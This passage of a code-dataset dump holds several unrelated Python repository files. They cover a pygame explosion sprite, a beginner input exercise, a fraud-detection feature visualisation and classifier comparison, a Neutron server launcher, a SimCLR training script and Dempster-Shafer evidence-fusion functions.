Container With Most Water.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"17755206247","text":"import math\nimport pygame\nfrom pygEngine.vector2D import Vector2D\nfrom pygEngine.transform import Transform\nfrom pygEngine.imageLoader import ImageLoader\nfrom pygEngine.triangleCollider import TriangleCollider\nfrom pygEngine._gameObjects.staticGameObject import StaticGameObject\nfrom pygame.locals import *\nclass Explosion(StaticGameObject):\n\n\tdef __init__(self,transform, params):\n\t\tStaticGameObject.__init__(self, transform, params)\n\n\tdef setup(self):\n\t\tself.lifetime = 0.15\n\t\tself.bodyTexture = ImageLoader.get('Explosion')\n\t\tself.rotateSpeed = 1\n\t\tself.speed = 500\n\t\tself.bodyTexture.convert()\n\t\tself.params.life = 0\n\n\tdef getParams(self):\n\t\treturn (self.transform, self.team, self.layer, self.life, self.__class__.__name__)\n\n\tdef draw(self, main, offset = Vector2D.zero()):\n\t\tscreen = main.screen\n\t\tim = pygame.transform.scale(self.bodyTexture.copy(), (int(self.bodyTexture.get_width()*self.params.life/self.lifetime),int(self.bodyTexture.get_height()*self.params.life/self.lifetime)))\n\t\tim.set_colorkey((0, 0, 0))\n\t\tscreen.blit(im, (self.transform.pos.x + offset.x -im.get_width()/2, self.transform.pos.y + offset.y - im.get_height()/2))\n\n\tdef update(self, dt, main):\n\t\tif self.params.life > self.lifetime:\n\t\t\tself.removeGameObject(self, main)\n\t\telse:\n\t\t\tself.params.life += dt\nif __name__ == \"__main__\":\n\tprint('Nothing to 
do...')","repo_name":"Fran6nd/pyTank","sub_path":"explosion.py","file_name":"explosion.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74405704448","text":"# Comando abaixo limpa o terminal antes de executar o próximo código\nprint(\"\\x1bc\")\n\ndef saudacao(msg, nome):\n print(f\"\\n{msg}, {nome}\\n\")\n\ndef verificaDigito(msg, nome):\n if msg.isdigit() == False and msg.isdigit() == False:\n return True\n else:\n return False\n\nwhile True:\n msg = input(\"Saudacao: \")\n nome = input(\"Nome: \")\n\n valor = verificaDigito(msg, nome)\n if valor == True:\n saudacao(msg, nome)\n else:\n print(\"valor invalido, tente novamente, mais tarde.\")\n break\n\n","repo_name":"hellboy89/Python","sub_path":"Aulas_LuizMiranda-Udemy/aula054/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24909774852","text":"import csv\r\nimport math\r\nimport numpy as np\r\nimport random\r\nfrom sklearn import svm\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\n\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.manifold import TSNE\r\n\r\n\r\ndef myfind(x, y):\r\n idx = []\r\n for row in list(range(len(y))):\r\n if y[row] == x:\r\n idx.append(row)\r\n return idx\r\n\r\n\r\ncate = 669\r\nuserFile = \"withBrandGiveTagOfCate\" + str(cate) + \".csv\"\r\nuserInfo = csv.reader(open(userFile, 'r'))\r\n\r\nfeatureLength = 35\r\nunusedFeatureList = [0, 2, 3]\r\ntimestampFeatureList = [13, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34] # 11\r\nnumFeatureList = [4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24] # 20\r\n\r\ni = 0\r\nfeature = []\r\ny = []\r\ntrueNum = 0\r\nfraudNum = 0\r\nfor row in userInfo:\r\n if i == 0:\r\n i = i + 1\r\n continue\r\n else:\r\n if row[35] == \"True\":\r\n row[35] = 1\r\n trueNum = trueNum + 1\r\n elif row[35] == \"False\":\r\n row[35] = -1\r\n fraudNum = fraudNum + 1\r\n else:\r\n continue\r\n\r\n tag = [row[1], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11], row[12], row[13], row[14],\r\n row[15], row[16], row[17], row[18], row[19], row[20], row[21], row[22], row[23], row[24], row[25],\r\n row[26], row[27], row[28], row[29], row[30], row[31], row[32], row[33], row[34]]\r\n tag = [abs(float(i)) for i in tag]\r\n feature.append(tag)\r\n y.append(row[35])\r\n\r\nuser_FeatureRecord = ['user', 'brand', 'user_Truthful', 'user_FraudBuyNum',\r\n 'user_BrandPv', 'user_BrandFav', 'user_BrandCart', 'user_BrandBuy',\r\n 'user_CatePv', 'user_CateFav', 'user_CateCart', 'user_CateBuy',\r\n 'user_ReBuyNum', 'user_ReBuyTimeGap',\r\n 'user_TimesFromPvToBuy', 'user_TimesFromFavToBuy', 'user_TimesFromCartToBuy',\r\n 'user_OtherNumFromPvToBuy', 'user_OtherNumFromFavToBuy', 'user_OtherNumFromCartToBuy',\r\n 'user_OtherNumFromBuyToBuy', 'user_OtherTimesFromPvToBuy', 'user_OtherTimesFromFavToBuy',\r\n 'user_OtherTimesFromCartToBuy', 'user_OtherTimesFromBuyToBuy',\r\n 'user_BrandPvToBuyTime', 'user_BrandFavToBuyTime', 'user_BrandCartToBuyTime',\r\n 'user_CatePvToBuyTime', 'user_CateFavToBuyTime', 'user_CateCartToBuyTime',\r\n 'user_BrandViewTime', 'user_CateViewTime', 'user_ReBuyBrandViewTime', 'user_ReBuyCateViewTime']\r\n\r\ntemparray = np.array(feature, dtype=float)\r\nm, n = 
temparray.shape\r\n# 归一化每一个特征\r\nfor j in range(n):\r\n features = temparray[:, j]\r\n meanVal = np.mean(features, axis=0)\r\n std = np.std(features, axis=0)\r\n if std != 0:\r\n # temparray[:, j] = (features - meanVal) / std\r\n temparray[:, j] = features / std\r\n else:\r\n temparray[:, j] = 0\r\n\r\npca = PCA(n_components=26, whiten=True)\r\n# pca = PCA(n_components='mle')\r\npca.fit(temparray)\r\nprint(pca.explained_variance_)\r\nprint(pca.explained_variance_ratio_)\r\nprint(pca.n_components)\r\n\r\nX = pca.transform(temparray)\r\ndata_pca_tsne = TSNE(n_components=2).fit_transform(X)\r\nfirstFea = data_pca_tsne[:, 0]\r\nsecondFea = data_pca_tsne[:, 1]\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.set_title(\"Scatter Plot\")\r\ntrueIdx = myfind(1, y)\r\nax.scatter(firstFea[trueIdx], secondFea[trueIdx], c='r', marker='o')\r\nfalseIdx = myfind(-1, y)\r\nax.scatter(firstFea[falseIdx], secondFea[falseIdx], c='g', marker='*')\r\nplt.show()\r\n\r\n#\r\n# maxFeature = 23\r\n# timestampMaxFeature = 6\r\n# numMaxFeature = 12\r\n# model2 = SelectKBest(chi2, k=maxFeature)#选择k个最佳特征\r\n# model2.fit_transform(temparray, y)\r\n# # model2.fit_transform(final, y)\r\n# featureScore = model2.scores_.tolist()\r\n# maxIndex = [0]\r\n# timestampNumTag = 0\r\n# numTag = 0\r\n# for i in range(maxFeature):\r\n# index = featureScore.index(max(featureScore))\r\n# if index in timestampFeatureList and timestampNumTag < timestampMaxFeature:\r\n# maxIndex.append(index)\r\n# timestampNumTag = timestampNumTag + 1\r\n#\r\n# if index in numFeatureList and numTag < numMaxFeature:\r\n# maxIndex.append(index)\r\n# numTag = numTag + 1\r\n#\r\n# featureScore[index] = 0\r\n#\r\n# print(maxIndex)\r\n#\r\n#\r\n# # k = 0\r\n# # for i in range(featureLength):\r\n# # while k in unusedFeatureList:\r\n# # k = k + 1\r\n# # if k < featureLength:\r\n# # print(k, i, user_FeatureRecord[k], model2.scores_[i])\r\n# # k = k + 1\r\n#\r\n# finalFeature = []\r\n# # for row in final:\r\n# for row in temparray:\r\n# # temp = [row[11], row[12], row[13], row[16], row[18], row[20], row[22], row[25],\r\n# # row[27], row[28], row[29]]\r\n# temp = []\r\n# for i in maxIndex:\r\n# temp.append(row[i])\r\n# finalFeature.append(temp)\r\n#\r\n# temparray = np.array(finalFeature, dtype=float)\r\n#\r\n# temparray = X\r\n#\r\n# trainRate = 0.8\r\n# x_trainSeq = random.sample(list(range(0, trueNum)), int(math.floor(trainRate * trueNum)))\r\n# y_trainSeq = random.sample(list(range(0, fraudNum)), int(math.floor(trainRate * fraudNum)))\r\n#\r\n# x_train = []\r\n# x_test = []\r\n# y_train = []\r\n# y_test = []\r\n#\r\n# trueRecord = 0\r\n# fraudRecord = 0\r\n# for i in list(range(0, m)):\r\n# if y[i] == 1:\r\n# if trueRecord in x_trainSeq:\r\n# x_train.append(temparray[i])\r\n# y_train.append(y[i])\r\n# else:\r\n# x_test.append(temparray[i])\r\n# y_test.append(y[i])\r\n# trueRecord = trueRecord + 1\r\n# else:\r\n# if fraudRecord in y_trainSeq:\r\n# x_train.append(temparray[i])\r\n# y_train.append(y[i])\r\n# else:\r\n# x_test.append(temparray[i])\r\n# y_test.append(y[i])\r\n# fraudRecord = fraudRecord + 1\r\n#\r\n# classifier = svm.SVC(C=0.1, kernel='linear', decision_function_shape='ovr', probability=True)\r\n# # classifier = svm.SVC(C=0.8, kernel='rbf', gamma=20, decision_function_shape='ovr')\r\n# classifier.fit(x_train, y_train)\r\n#\r\n# print(\"训练集准确率\" + str(classifier.score(x_train, y_train))) # 精度\r\n# y_hat = classifier.predict(x_train)\r\n# print(y_hat)\r\n# # num = 0\r\n# # for i in list(range(0, len(y_train))):\r\n# # if y_train[i] == 
y_hat[i]:\r\n# # num = num + 1\r\n# #\r\n# # print(num / len(y_train))\r\n# print(\"测试集准确率\" + str(classifier.score(x_test, y_test)))\r\n# y_hat = classifier.predict(x_test)\r\n# print(y_hat)\r\n# fraudTestNum = 0\r\n# recognizeNum = 0\r\n# trueTestNum = 0\r\n# falseRecognizeNum = 0\r\n# for i in range(len(y_hat)):\r\n# print(y_test[i], y_hat[i])\r\n# if y_test[i] == -1:\r\n# fraudTestNum = fraudTestNum + 1\r\n# if y_hat[i] == -1:\r\n# recognizeNum = recognizeNum + 1\r\n# if y_test[i] == 1:\r\n# trueTestNum = trueTestNum + 1\r\n# if y_hat[i] == -1:\r\n# falseRecognizeNum = falseRecognizeNum + 1\r\n#\r\n# print(recognizeNum / fraudTestNum)\r\n# print(falseRecognizeNum / trueTestNum)\r\n# # print(y_test)\r\n#\r\n# #效果评估:\r\n# #准确率:scikit-learn提供了accuracy_score来计算:LogisticRegression.score()\r\n# #准确率是分类器预测正确性的比例,但是并不能分辨出假阳性错误和假阴性错误\r\n# # cv 交叉验证 次数\r\n# print(\"交叉验证:\")\r\n# scores = cross_val_score(classifier, x_train, y_train, cv=5)\r\n# print('训练准确率:', np.mean(scores), scores)\r\n#\r\n# scores = cross_val_score(classifier, x_test, y_test, cv=5)\r\n# print('测试准确率:', np.mean(scores), scores)\r\n#\r\n# precisions = cross_val_score(classifier, x_train, y_train, cv=5, scoring='precision')\r\n# print(u'精确率:', np.mean(precisions), precisions)\r\n# recalls = cross_val_score(classifier, x_train, y_train, cv=5, scoring='recall')\r\n# print(u'召回率:', np.mean(recalls), recalls)\r\n# plt.scatter(recalls, precisions)\r\n#\r\n# # 综合评价指标\r\n# f1s = cross_val_score(classifier, x_train, y_train, cv=5, scoring='f1')\r\n# print('综合评价指标:', np.mean(f1s), f1s)\r\n# # 综合评价指标是80%。由于精确率和召回率的差异比较小,所以综合评价指标的罚值也比较小。有时也会用F0.5和F2,表示精确率权重大于召回率,或召回率权重大于精确率。\r\n#\r\n# # ROC AUC\r\n# # ROC曲线(Receiver Operating Characteristic,ROC curve)可以用来可视化分类器的效果。和准确率不同,ROC曲线对分类比例不平衡的数据集不敏感,ROC曲线显示的是对超过限定阈值的所有预测结果的分类器效果。ROC曲线画的是分类器的召回率与误警率(fall-out)的曲线。误警率也称假阳性率,是所有阴性样本中分类器识别为阳性的样本所占比例:\r\n# # F=FP/(TN+FP) AUC是ROC曲线下方的面积,它把ROC曲线变成一个值,表示分类器随机预测的效果. 
from sklearn.metrics import roc_curve, auc\r\n# from sklearn.metrics import roc_curve, auc\r\n#\r\n# predictions = classifier.predict_proba(x_test)\r\n# false_positive_rate, recall, thresholds = roc_curve(y_test, predictions[:, 1])\r\n# roc_auc = auc(false_positive_rate, recall)\r\n# plt.title('SVM Receiver Operating Characteristic')\r\n# plt.plot(false_positive_rate, recall, 'b', label='AUC = %0.2f' % roc_auc)\r\n# plt.legend(loc='lower right')\r\n# plt.plot([0, 1], [0, 1], 'r--')\r\n# plt.xlim([0.0, 1.0])\r\n# plt.ylim([0.0, 1.0])\r\n# plt.ylabel('Recall')\r\n# plt.xlabel('Fall-out')\r\n# plt.show()\r\n# # plt.savefig(\"../FeatureCate\" + str(cate) + \"/SVM_ROC.png\")\r\n#\r\n#\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import ListedColormap\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.datasets import make_moons, make_circles, make_classification\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.gaussian_process import GaussianProcessClassifier\r\nfrom sklearn.gaussian_process.kernels import RBF\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\r\n\r\nh = .02 # step size in the mesh\r\n\r\nnames = [\"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\", \"Gaussian Process\",\r\n \"Decision Tree\", \"Random Forest\", \"Neural Net\", \"AdaBoost\",\r\n \"Naive Bayes\", \"QDA\"]\r\n\r\nclassifiers = [\r\n KNeighborsClassifier(3),\r\n SVC(kernel=\"linear\", C=0.025),\r\n SVC(gamma=2, C=1),\r\n GaussianProcessClassifier(1.0 * RBF(1.0)),\r\n DecisionTreeClassifier(max_depth=5),\r\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\r\n MLPClassifier(alpha=1),\r\n AdaBoostClassifier(),\r\n GaussianNB(),\r\n QuadraticDiscriminantAnalysis()]\r\n\r\nX = data_pca_tsne\r\n\r\nfigure = plt.figure(figsize=(27, 9))\r\ni = 1\r\n# iterate over datasets\r\n\r\n# preprocess dataset, split into training and test part\r\n\r\nX = StandardScaler().fit_transform(X)\r\nX_train, X_test, y_train, y_test = \\\r\n train_test_split(X, y, test_size=.4, random_state=42)\r\n\r\nx_min, x_max = X.min() - .5, X.max() + .5\r\ny_min, y_max = y.min() - .5, y.max() + .5\r\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h),\r\n np.arange(y_min, y_max, h))\r\n\r\n# just plot the dataset first\r\ncm_bright = ListedColormap(['#FF0000', '#0000FF'])\r\nax = plt.subplot(len(datasets), len(classifiers) + 1, i)\r\n\r\nax.set_title(\"Input data\")\r\n# Plot the training points\r\nax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\r\n edgecolors='k')\r\n# and testing points\r\nax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright, alpha=0.6,\r\n edgecolors='k')\r\nax.set_xlim(xx.min(), xx.max())\r\nax.set_ylim(yy.min(), yy.max())\r\nax.set_xticks(())\r\nax.set_yticks(())\r\ni += 1\r\n\r\n# iterate over classifiers\r\nfor name, clf in zip(names, classifiers):\r\n ax = plt.subplot(len(datasets), len(classifiers) + 1, i)\r\n clf.fit(X_train, y_train)\r\n score = clf.score(X_test, y_test)\r\n\r\n # Plot the decision boundary. 
For that, we will assign a color to each\r\n # point in the mesh [x_min, x_max]x[y_min, y_max].\r\n if hasattr(clf, \"decision_function\"):\r\n Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])\r\n else:\r\n Z = clf.predict_proba(np.c_[xx.ravel(), yy.ravel()])[:, 1]\r\n\r\n # Put the result into a color plot\r\n Z = Z.reshape(xx.shape)\r\n ax.contourf(xx, yy, Z, alpha=.8)\r\n\r\n # Plot also the training points\r\n ax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\r\n edgecolors='k')\r\n # and testing points\r\n ax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright,\r\n edgecolors='k', alpha=0.6)\r\n\r\n ax.set_xlim(xx.min(), xx.max())\r\n ax.set_ylim(yy.min(), yy.max())\r\n ax.set_xticks(())\r\n ax.set_yticks(())\r\n\r\n ax.set_title(name)\r\n ax.text(xx.max() - .3, yy.min() + .3, ('%.2f' % score).lstrip('0'),\r\n size=15, horizontalalignment='right')\r\n i += 1\r\n\r\nplt.tight_layout()\r\nplt.show()","repo_name":"Change72/gc-python-graduate","sub_path":"FeatureCate669/16withBrand_fifth.py","file_name":"16withBrand_fifth.py","file_ext":"py","file_size_in_byte":13235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14863437351","text":"import eventlet\nimport sys\n\nfrom oslo.config import cfg\n\nfrom neutron.common import config\nfrom neutron import service\n\nfrom neutron.openstack.common import gettextutils\nfrom neutron.openstack.common import log as logging\ngettextutils.install('neutron', lazy=True)\n\nLOG = logging.getLogger(__name__)\n\n\ndef main():\n eventlet.monkey_patch()\n\n # the configuration will be read into the cfg.CONF global data structure\n config.parse(sys.argv[1:])\n if not cfg.CONF.config_file:\n sys.exit(_(\"ERROR: Unable to find configuration file via the default\"\n \" search paths (~/.neutron/, ~/, /etc/neutron/, /etc/) and\"\n \" the '--config-file' option!\"))\n try:\n pool = eventlet.GreenPool()\n\n neutron_api = service.serve_wsgi(service.NeutronApiService)\n api_thread = pool.spawn(neutron_api.wait)\n\n try:\n neutron_rpc = service.serve_rpc()\n except NotImplementedError:\n LOG.info(_(\"RPC was already started in parent process by plugin.\"))\n else:\n rpc_thread = pool.spawn(neutron_rpc.wait)\n\n # api and rpc should die together. When one dies, kill the other.\n rpc_thread.link(lambda gt: api_thread.kill())\n api_thread.link(lambda gt: rpc_thread.kill())\n\n pool.waitall()\n except KeyboardInterrupt:\n pass\n except RuntimeError as e:\n sys.exit(_(\"ERROR: %s\") % e)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/neutron/neutron/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"73819426688","text":"import argparse \nimport torch\nimport torchvision\nimport utils\nimport simclr\nfrom PIL import Image\nimport os\n\n# making a command line interface\nparser = argparse.ArgumentParser(description=\"This is the command line interface for the SimCLR framework for self-supervised learning. Below are the arguments which are required to run this program.\")\n\nparser.add_argument('datapath', type=str ,help=\"Path to the data root folder which contains train and test folders\")\n\nparser.add_argument('respath', type=str, help=\"Path to the results directory where the saved model and evaluation graphs would be stored. 
\")\n\nparser.add_argument('-bs','--batch_size',default=250, type=int, help=\"The batch size for self-supervised training\")\n\nparser.add_argument('-nw','--num_workers',default=2,type=int,help=\"The number of workers for loading data\")\n\nparser.add_argument('-c','--cuda',action='store_true')\n\nparser.add_argument('--multiple_gpus', action='store_true')\n\nclass TrainDataset(torch.utils.data.Dataset):\n\n def __init__(self, args):\n self.args = args\n \n with open(os.path.join(args.datapath, \"train\",\"names.txt\")) as f:\n self.filenames = f.read().split('\\n')\n \n def __len__(self):\n return len(self.filenames)\n\n def tensorify(self, img):\n return torchvision.transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(\n torchvision.transforms.ToTensor()(img)\n )\n\n def augmented_image(self, img):\n return utils.transforms.get_color_distortion(1)(\n torchvision.transforms.RandomResizedCrop(224)(img)\n ) \n\n def __getitem__(self, idx):\n img = torchvision.transforms.Resize((224, 224))(\n Image.open(os.path.join(args.datapath, 'train', self.filenames[idx])).convert('RGB')\n )\n return {\n 'image1':self.tensorify(\n self.augmented_image(img)\n ), \n 'image2': self.tensorify(\n self.augmented_image(img)\n )\n }\n\nif __name__ == '__main__':\n args = parser.parse_args()\n args.device = torch.device('cuda' if args.cuda else 'cpu')\n model = utils.model.get_model(args)\n \n optimizer = torch.optim.Adam(\n model.parameters(), \n lr=0.001, \n weight_decay=1e-4\n )\n \n dataloaders = {}\n \n dataloaders['train'] = torch.utils.data.DataLoader(\n TrainDataset(args), \n batch_size=args.batch_size, \n shuffle=True, \n num_workers=args.num_workers\n )\n \n loss_fn = utils.ntxent.loss_function\n simclrobj = simclr.SimCLR(model, optimizer, dataloaders, loss_fn)\n simclrobj.train(args, 200, 10)\n","repo_name":"thunderInfy/simclr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"43"} +{"seq_id":"13739593012","text":"import time\n\nimport numpy as np\nimport torch\n\nfrom distance import cosine_distance, js_distance, bhattacharyya_distance, entropy, cosine_distance_torch, \\\n js_distance_torch, bhattacharyya_distance_torch\n\n\ndef calc_conflict(a: np.ndarray, b: np.ndarray) -> float:\n assert len(a.shape) == 1, f\"expected array a's shape be (N,), having {a.shape}\"\n assert len(b.shape) == 1, f\"expected array b's shape be (N,), having {b.shape}\"\n assert a.shape[0] == b.shape[0], f\"expected array a and b have same length, having a: {a.shape} and b: {b.shape}\"\n\n a, b = np.expand_dims(a, axis=-1), np.expand_dims(b, axis=-1)\n\n return np.dot(a, b.T).sum() - np.dot(a.T, b).sum()\n\n\ndef ds_fusion_numpy(e: np.ndarray, distance: str, beta: np.ndarray, W: np.ndarray, RI=None):\n \"\"\"\n improved label fusion method based on D-S Evidence Theory using subjective and objective evidence in numpy\n :param e: evidences to be fused, shape=(L, N)\n :param distance: distance metric\n :param beta: subjective weights, shape=(M, L)\n :param W: AHP comparison matrix, shape=(M+1,M+1)\n :param RI: RI,must be input when M>=10\n :return: fusion result, shape=(N,)\n \"\"\"\n\n if distance == 'cos':\n distance_func = cosine_distance\n elif distance == 'js':\n distance_func = js_distance\n elif distance == 'bd':\n distance_func = bhattacharyya_distance\n else:\n raise Exception(f'no distance function called {distance}')\n\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in 
range(e.shape[0]):\n for j in range(i + 1, e.shape[0]):\n dis_matrix[i, j] = dis_matrix[j, i] = distance_func(e[i], e[j])\n\n d = np.sum(dis_matrix, axis=-1)\n\n alpha = 1. / d\n alpha = alpha / alpha.sum()\n\n if W.shape[0] > 10 and RI is None:\n raise Exception(\"RI required\")\n\n RI_table = [0, 0, 0, .58, .90, 1.12, 1.24, 1.32, 1.41, 1.45, 1.49]\n if W.shape[0] <= 10:\n RI = RI_table[W.shape[0]]\n\n value, vector = np.linalg.eig(W)\n\n lambda_max, lambda_index = value.max(), value.argmax()\n CI = (lambda_max - W.shape[0]) / (W.shape[0] - 1)\n if CI / RI > 0.1:\n raise Exception(\"consistency check failed\")\n\n x = vector[:, lambda_index]\n x = np.expand_dims(np.real(x / x.sum()), 0)\n\n delta = np.vstack((np.asarray([alpha]), beta))\n delta = delta / delta.sum(axis=-1, keepdims=True)\n delta = np.dot(x, delta)\n\n e_ = np.sum(delta.T * e, axis=0)\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict(result, e_))\n\n return result\n\n\ndef calc_conflict_torch(a: torch.Tensor, b: torch.Tensor) -> float:\n a, b = torch.unsqueeze(a, dim=-1), torch.unsqueeze(b, dim=-1)\n\n return (a @ b.T).sum() - (a.T @ b).sum()\n\n\ndef ds_fusion_torch(e: torch.Tensor, distance: str, beta: torch.Tensor, W: torch.Tensor, RI=None):\n if distance == 'cos':\n distance_func = cosine_distance_torch\n elif distance == 'js':\n distance_func = js_distance_torch\n elif distance == 'bd':\n distance_func = bhattacharyya_distance_torch\n else:\n raise Exception(f'no distance function called {distance}')\n\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(i + 1, e.shape[0]):\n dis_matrix[i, j] = dis_matrix[j, i] = distance_func(e[i], e[j])\n\n d = torch.clip(torch.sum(dis_matrix, dim=-1), min=1e-6, max=1e6)\n\n alpha = 1. / d\n alpha = alpha / alpha.sum()\n\n if W.shape[0] > 10 and RI is None:\n raise Exception(\"RI required\")\n\n RI_table = [0, 0, 0, .58, .90, 1.12, 1.24, 1.32, 1.41, 1.45, 1.49]\n if W.shape[0] <= 10:\n RI = RI_table[W.shape[0]]\n\n value, vector = torch.linalg.eig(W)\n\n lambda_max, lambda_index = torch.max(value.real).item(), torch.argmax(value.real).item()\n\n CI = (lambda_max - W.shape[0]) / (W.shape[0] - 1)\n if W.shape[0] > 2 and CI / RI > 0.1:\n raise Exception(\"consistency check failed\")\n\n x = vector[:, lambda_index].real\n x = torch.unsqueeze(x / x.sum(), 0)\n\n delta = torch.vstack((torch.unsqueeze(alpha, 0), beta))\n delta = delta / torch.sum(delta, dim=-1, keepdim=True)\n delta = x @ delta\n\n e_ = torch.sum(delta.T * e, dim=0)\n\n result = torch.clone(e_)\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict_torch(result, e_))\n\n return result\n\n\ndef contrast_algorithm_zhang(e: np.ndarray):\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = bhattacharyya_distance(e[i], e[j])\n\n d = np.sum(dis_matrix, axis=-1)\n\n alpha = 1. 
/ d\n alpha = alpha / alpha.sum()\n alpha = np.expand_dims(alpha, axis=0)\n\n e_ = np.sum(alpha.T * e, axis=0)\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict(result, e_)\n\n return result\n\n\ndef contrast_algorithm_Bai(e: np.ndarray, b=10):\n import pyemd\n\n distance_matrix = (np.ones((b, b)) - np.identity(b)) * np.sqrt(2)\n\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = pyemd.emd(e[i], e[j], distance_matrix)\n\n sim_matrix = np.exp(-dis_matrix)\n\n sup = sim_matrix.sum(axis=-1) - 1\n\n w_crd = sup / sup.sum()\n\n e = np.clip(e, 1e-6, 1e6)\n\n E_d = -np.sum(e * np.log(e), axis=-1)\n\n m_plus = e[np.argmin(E_d)]\n m_minus = e[np.argmax(E_d)]\n\n bmd_max = pyemd.emd(m_plus, m_minus, distance_matrix)\n D_minus = np.zeros((e.shape[0],))\n for i in range(e.shape[0]):\n D_minus[i] = pyemd.emd(e[i], m_minus, distance_matrix)\n\n chi_minus = D_minus / bmd_max\n chi_minus = np.clip(chi_minus, 1e-7, 1e6)\n true_mask = chi_minus <= 0.75\n false_mask = chi_minus > 0.75\n\n I = chi_minus * true_mask + (1 - chi_minus) * false_mask\n\n w_dist = I / I.sum()\n\n W = w_dist * w_crd\n W = W / W.sum()\n W = np.expand_dims(W, axis=0)\n\n e_ = np.sum(W.T * e, axis=0)\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict(result, e_)\n\n return result\n\n\ndef contrast_algorithm_zhang_torch(e: torch.Tensor):\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = bhattacharyya_distance_torch(e[i], e[j])\n\n D = torch.sum(dis_matrix, dim=-1)\n alpha = 1. / D\n alpha = alpha / alpha.sum()\n alpha = torch.unsqueeze(alpha, dim=0)\n\n e_ = torch.sum(alpha.T * e, dim=0)\n\n result = e_.clone()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict_torch(result, e_)\n\n return result\n\n\ndef contrast_algorithm_jiang(e: np.ndarray):\n def jousselme_distance(p: np.ndarray, q: np.ndarray):\n return np.sqrt(0.5 * np.dot(np.expand_dims(p - q, axis=0), np.expand_dims(p - q, axis=-1)))\n\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = jousselme_distance(e[i], e[j])\n\n d_bar = dis_matrix.sum(axis=-1) / (e.shape[0] - 1)\n d = d_bar.sum() / e.shape[0]\n credible_mask = d_bar <= d\n incredible_mask = d_bar > d\n\n e = np.clip(e, a_min=1e-6, a_max=1e6)\n\n E_d = -np.sum(e * np.log(e), axis=-1)\n E_d = E_d / E_d.sum()\n\n alpha = credible_mask * np.exp(-E_d) + incredible_mask * np.exp(-(np.max(E_d) + 1 - E_d))\n w = np.expand_dims(alpha / alpha.sum(), axis=0)\n\n e_ = np.sum(w.T * e, axis=0)\n e_ = e_ / e_.sum()\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict(result, e_))\n\n return result\n\n\ndef contrast_algorithm_jiang_torch(e: torch.Tensor):\n def jousselme_distance(p: torch.Tensor, q: torch.Tensor):\n return torch.sqrt(0.5 * (torch.unsqueeze(p - q, dim=0) @ torch.unsqueeze(p - q, dim=-1)))\n\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = jousselme_distance(e[i], e[j])\n\n d_bar = dis_matrix.sum(dim=-1) / (e.shape[0] - 1)\n d = d_bar.sum() / e.shape[0]\n credible_mask = d_bar <= d\n incredible_mask = d_bar > d\n\n e = torch.clip(e, min=1e-6, max=1e6)\n\n E_d = 
